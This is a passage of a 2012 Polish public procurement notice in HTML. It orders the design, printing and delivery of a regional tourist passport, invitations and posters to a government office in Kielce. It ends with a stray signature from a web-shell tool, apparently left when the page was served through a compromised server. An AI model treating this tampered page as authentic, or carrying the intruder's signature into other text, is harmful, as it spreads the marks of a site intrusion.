4.	Miejscem dostarczenia wykonanego przedmiotu zamówienia jest siedziba Zamawiającego w Kielcach przy ul. Paderewskiego 34A, 25-502 Kielce (Departament Promocji, Edukacji, Kultury, Sportu i Turystyki)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.81.00.00-5, 79.82.20.00-2, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ŚWIĘTOKRZYSKI PASZPORT TURYSTYCZNY, ZAPROSZENIA I PLAKATY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w III części zamówienia jest opracowanie graficzne, korekta, skład, druk wraz z pakowaniem i dostarczeniem do siedziby Zamawiającego, oraz rozładunkiem przez Wykonawcę w miejscach wskazanych przez Zamawiającego: 
a)	Świętokrzyskiego paszportu turystycznego - w nakładzie 15 000 egzemplarzy;
b)	Zaproszeń:
-	Inauguracja sezonu turystycznego - w nakładzie 300 sztuk;
-	Światowy Dzień Turystyki - Obchody Wojewódzkie - w nakładzie 300 sztuk;
-	Świętokrzyski Jarmark Agroturystyczny - 500 sztuk;
c)	 Plakatów - Świętokrzyski Jarmark Agroturystyczny w nakładzie:
-	Format A2 - 200 sztuk,
-	Format B1 - 100 sztuk.
2.	Szczegółowy opis Części III zamówienia zawarty został w Załączniku Nr 1C do SIWZ. 
3.	W toku realizacji zamówienia Wykonawca będzie przeprowadzał z Zamawiającym konsultacje w zakresie opracowania, graficznego i składu publikacji, a także będzie musiał uzyskać akceptację Zamawiającego ich ostatecznej wersji. 
4.	Miejscem dostarczenia wykonanego przedmiotu zamówienia jest siedziba Zamawiającego w Kielcach przy ul. Paderewskiego 34A, 25-502 Kielce (Departament Promocji, Edukacji, Kultury, Sportu i Turystyki)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-0, 79.81.00.00-5, 79.82.20.00-2, 79.82.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com